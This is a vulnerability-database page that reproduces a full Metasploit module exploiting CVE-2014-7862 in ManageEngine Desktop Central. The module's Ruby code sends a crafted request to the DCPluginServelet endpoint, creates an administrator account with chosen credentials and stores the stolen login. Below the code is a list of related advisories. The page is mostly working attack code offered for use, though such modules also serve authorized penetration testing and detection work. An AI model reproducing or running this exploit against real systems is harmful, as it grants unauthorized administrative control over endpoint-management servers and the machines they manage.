Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtMetasploit1337DAY-ID-23075
HistoryJan 06, 2015 - 12:00 a.m.

ManageEngine Desktop Central Administrator Account Creation Exploit

2015-01-0600:00:00
metasploit
0day.today
45

EPSS

0.961

Percentile

99.5%

JSON

This module exploits an administrator account creation vulnerability in Desktop Central from v7 onwards by sending a crafted request to DCPluginServelet. It has been tested in several versions of Desktop Central (including MSP) from v7 onwards.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'ManageEngine Desktop Central Administrator Account Creation',
'Description' => %q{
This module exploits an administrator account creation vulnerability in Desktop Central
from v7 onwards by sending a crafted request to DCPluginServelet. It has been tested in
several versions of Desktop Central (including MSP) from v7 onwards.
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2014-7862'],
['OSVDB', '116554'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_dc9_admin.txt'],
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/2']
],
'DisclosureDate' => 'Dec 31 2014'))
register_options(
[
OptPort.new('RPORT', [true, 'The target port', 8020]),
OptString.new('TARGETURI', [ true, 'ManageEngine Desktop Central URI', '/']),
OptString.new('USERNAME', [true, 'The username for the new admin account', 'msf']),
OptString.new('PASSWORD', [true, 'The password for the new admin account', 'password']),
OptString.new('EMAIL', [true, 'The email for the new admin account', '[emailΒ protected]'])
], self.class)
end
def run
# Generate password hash
salt = Time.now.to_i.to_s
password_encoded = Rex::Text.encode_base64([Rex::Text.md5(datastore['PASSWORD'] + salt)].pack('H*'))
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "/servlets/DCPluginServelet"),
'method' =>'GET',
'vars_get' => {
'action' => 'addPlugInUser',
'role' => 'DCAdmin',
'userName' => datastore['USERNAME'],
'email' => datastore['EMAIL'],
'phNumber' => Rex::Text.rand_text_numeric(6),
'password' => password_encoded,
'salt' => salt,
'createdtime' => salt
}
})
# Yes, "sucess" is really mispelt, as is "Servelet" ... !
unless res && res.code == 200 && res.body && res.body.to_s =~ /sucess/
print_error("#{peer} - Administrator account creation failed")
end
print_good("#{peer} - Created Administrator account with credentials #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
service_data = {
address: rhost,
port: rport,
service_name: (ssl ? 'https' : 'http'),
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
module_fullname: self.fullname,
private_type: :password,
private_data: datastore['PASSWORD'],
username: datastore['USERNAME']
}
credential_data.merge!(service_data)
credential_core = create_credential(credential_data)
login_data = {
core: credential_core,
access_level: 'Administrator',
status: Metasploit::Model::Login::Status::UNTRIED
}
login_data.merge!(service_data)
create_credential_login(login_data)
end
end

#  0day.today [2018-04-12]  #

Related

nessus 2
cvelist 1
packetstorm 2
metasploit 1
prion 1
exploitpack 1
zdt 1
securityvulns 2
exploitdb 1
checkpoint_advisories 1
openvas 1
nvd 1
cve 1
nessus
nessus
ManageEngine Desktop Central Remote Security Bypass (Intrusive Check)
2015-03-25 00:00:00
ManageEngine Desktop Central Remote Security Bypass
2015-03-25 00:00:00
cvelist
cvelist
CVE-2014-7862
2018-01-04 17:00:00
packetstorm
packetstorm
Desktop Central Add Administrator
2014-12-31 00:00:00
ManageEngine Desktop Central Administrator Account Creation
2024-08-31 00:00:00
metasploit
metasploit
ManageEngine Desktop Central Administrator Account Creation
2015-01-05 05:14:12
prion
prion
Deserialization of untrusted data
2018-01-04 17:29:00
exploitpack
exploitpack
ManageEngine Desktop Central - Create Administrator
2015-01-15 00:00:00
zdt
zdt
ManageEngine Desktop Central - Create Administrator Vulnerability
2018-01-26 00:00:00
securityvulns
securityvulns
[The ManageOwnage Series, part X]: 0-day administrator account creation in Desktop Central
2015-01-02 00:00:00
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2015-01-02 00:00:00
exploitdb
exploitdb
ManageEngine Desktop Central - Create Administrator
2015-01-15 00:00:00
checkpoint_advisories
checkpoint_advisories
ManageEngine Desktop Central Dcpluginservelet Policy Bypass (CVE-2014-7862)
2015-01-12 00:00:00
openvas
openvas
ManageEngine Desktop Central < 9.0.109 Remote Security Bypass Vulnerability
2018-02-23 00:00:00
nvd
nvd
CVE-2014-7862
2018-01-04 17:29:00
cve
cve
CVE-2014-7862
2018-01-04 17:29:00

EPSS

0.961

Percentile

99.5%

JSON
Related for 1337DAY-ID-23075
nessus2cvelist1packetstorm2metasploit1prion1exploitpack1zdt1securityvulns2exploitdb1checkpoint_advisories1openvas1nvd1cve1